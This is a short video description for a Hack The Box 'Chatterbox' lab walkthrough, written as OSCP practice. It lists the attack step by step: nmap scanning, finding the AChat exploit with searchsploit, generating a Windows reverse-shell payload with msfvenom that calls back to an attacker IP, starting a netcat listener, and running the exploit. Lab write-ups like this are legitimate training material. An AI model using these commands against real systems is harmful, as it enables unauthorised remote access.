Hi Folks This is the "Hack The Box ChatterBox Walkthrough without Metasploit 2022" video. I am publishing walkthroughs on retired "HackTheBox" machines in preparation for the OSCP. The full list of OSCP-like machines compiled by TJnull can be found below link https://docs.google.com/spreadsheets/u/1/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/htmlview# Commands/Process 1. Run #nmap scan for all ports nmap -v -sC -sV -p- (target_ip) 2. Search #achat #exploit using #searchsploit searchsploit achat 3. Copy #achat #exploit in the current working directory searchsploit -m 36025.py 4. Create #msfvenom #exploit msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.16.5 LPORT=9001 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python 5. Start Listen Port using #nc nc -lnvp (port_number) 6. Execute #exploit python 36025.py Thanks for watching my video. Put your queries and suggestions in the comment box. Like Share Subscribe

Hackthebox ChatterboxeJPTOSCP 2022Tryhackme